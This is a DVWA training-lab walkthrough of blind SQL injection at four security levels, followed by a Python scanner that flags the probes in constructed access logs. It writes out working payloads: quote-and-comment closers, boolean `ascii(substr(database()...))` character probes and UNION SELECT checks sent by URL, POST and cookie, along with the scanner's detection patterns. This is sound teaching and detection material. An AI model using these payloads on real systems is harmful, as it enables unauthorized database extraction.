【DVWA】【SQL Injection (Blind)】Blind SQL injection: Low, Medium, High, Impossible
阿新 • Published: 2018-02-02
1. Low level: Low.php
Submit the id with a single quote appended:
http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1'&Submit=Submit#
The page reports that the user ID was not found. The candidate queries the back end might be running, and what each would do with the value 1', are:
select first_name from users where user_id=1;         # Success, returns admin
select first_name from users where user_id="1'";      # Success, returns admin (MySQL casts "1'" to 1 in a numeric comparison)
select first_name from users where user_id='1'';      # Fail (syntax error)
select first_name from users where user_id=(1');      # Fail
select first_name from users where user_id=((1'));    # Fail
select first_name from users where user_id=(('1''));  # Fail
So the value is not closed with double quotes. Trying a single quote followed by a comment confirms it is closed with single quotes, since this request succeeds again:
http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1'%23&Submit=Submit#
Now build the boolean probe below: if the first character of the database name is 'd' (ASCII 100), the page renders normally,
http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1' and ascii(substr(database(),1,1))=100%23&Submit=Submit#
otherwise the page renders the "not found" state:
http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1' and ascii(substr(database(),1,1))=99%23&Submit=Submit#
2. Medium level: Medium.php
The id is now sent by POST:
id=0 union select 1,2#&Submit=Submit
The page still reports that the user exists, even though id=0 does not exist: the UNION SELECT returned a row, and the program only checks whether the result set is empty.
As in the Low level, guess the characters one at a time:
id=1 and ascii(substr(database(),1,1))=100#&Submit=Submit
3. High level: High.php
Unlike the previous level, the id is now stored in a cookie, set from this page:
http://localhost/DVWA-master/vulnerabilities/sqli_blind/cookie-input.php
Then refresh
http://localhost/DVWA-master/vulnerabilities/sqli_blind/
and use EditThisCookie to view the cookie.
Injection can be done directly on this page by editing the cookie value, for example:
0' union select 1,2#
and refreshing the page.
4. Impossible level: Impossible.php
Looking at the source shows that it first checks the id is numeric and then uses a PDO prepared statement with the id bound as an integer, so injection is not possible:
if( is_numeric( $id ) ) {
    // Check the database
    $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
    $data->bindParam( ':id', $id, PDO::PARAM_INT );
    $data->execute();
    // (result handling continues in the DVWA source)
}
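From the defender's side, the probes walked through above leave a distinctive trace in the web server's access log. The following is an added example, not code from the original post or from the DVWA project: a small Python scanner that flags the boolean-based character probes and UNION checks in constructed Apache-style log lines, and reports whether the probes produced two distinct response sizes (the "normal" and "not found" pages), which is what makes the oracle usable. The log lines, timestamps and response sizes are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access log lines modelled on the requests in this
# walkthrough: line 1 is a normal lookup, lines 2-3 are the two boolean probes
# (true page: size 512, false page: size 498), line 4 is the UNION check.
SAMPLE_LOG = """\
127.0.0.1 - - [02/Feb/2018:10:00:01 +0800] "GET /DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 512
127.0.0.1 - - [02/Feb/2018:10:00:02 +0800] "GET /DVWA-master/vulnerabilities/sqli_blind/?id=1%27%20and%20ascii(substr(database(),1,1))=100%23&Submit=Submit HTTP/1.1" 200 512
127.0.0.1 - - [02/Feb/2018:10:00:03 +0800] "GET /DVWA-master/vulnerabilities/sqli_blind/?id=1%27%20and%20ascii(substr(database(),1,1))=99%23&Submit=Submit HTTP/1.1" 200 498
127.0.0.1 - - [02/Feb/2018:10:00:04 +0800] "GET /DVWA-master/vulnerabilities/sqli_blind/?id=0%27%20union%20select%201,2%23&Submit=Submit HTTP/1.1" 200 512
"""

# Common log format: ip ident user [ts] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+)'
)

# Signatures for the techniques shown on this page, matched on the decoded URL.
PATTERNS = [
    ("boolean_char_probe", re.compile(r"\bascii\s*\(\s*substr\s*\(", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("quote_then_comment", re.compile(r"'[^&]*#")),  # 1' ... #  closes the quote
]


def classify_request(path):
    """Return the signature names matching a request path, after decoding."""
    decoded = unquote_plus(unquote_plus(path))  # second pass catches %2527-style double encoding
    return [name for name, rx in PATTERNS if rx.search(decoded)]


def scan_log(text):
    """Return (ip, timestamp, response_size, signatures) for every flagged line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        sigs = classify_request(m.group("path"))
        if sigs:
            hits.append((m.group("ip"), m.group("ts"), int(m.group("size")), sigs))
    return hits


def probe_size_classes(hits):
    """Distinct response sizes among boolean probes; two classes (the normal and
    the 'not found' page from the walkthrough) mean the oracle is working."""
    return sorted({size for _, _, size, sigs in hits if "boolean_char_probe" in sigs})


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for ip, ts, size, sigs in found:
        print(f"{ts} {ip} size={size} {','.join(sigs)}")
    print("boolean probe size classes:", probe_size_classes(found))
```

Because the High level carries the id in a cookie rather than the query string, catching it the same way requires logging the Cookie header (or instrumenting the application), which the default access log does not do.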